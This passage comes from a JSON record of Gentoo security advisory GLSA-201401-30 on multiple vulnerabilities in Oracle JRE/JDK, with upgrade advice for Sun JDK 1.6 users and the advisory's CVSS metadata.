Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one of the newer Oracle packages like dev-java/oracle-jdk-bin or dev-java/oracle-jre-bin or choose another alternative we provide; eg. the IBM JDK/JRE or the open source IcedTea. \n\nNOTE: As Oracle has revoked the DLJ license for its Java implementation, the packages can no longer be updated automatically.", "edition": 1, "modified": "2014-01-27T00:00:00", "published": "2014-01-27T00:00:00", "id": "GLSA-201401-30", "href": "https://security.gentoo.org/glsa/201401-30", "type": "gentoo", "title": "Oracle JRE/JDK: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
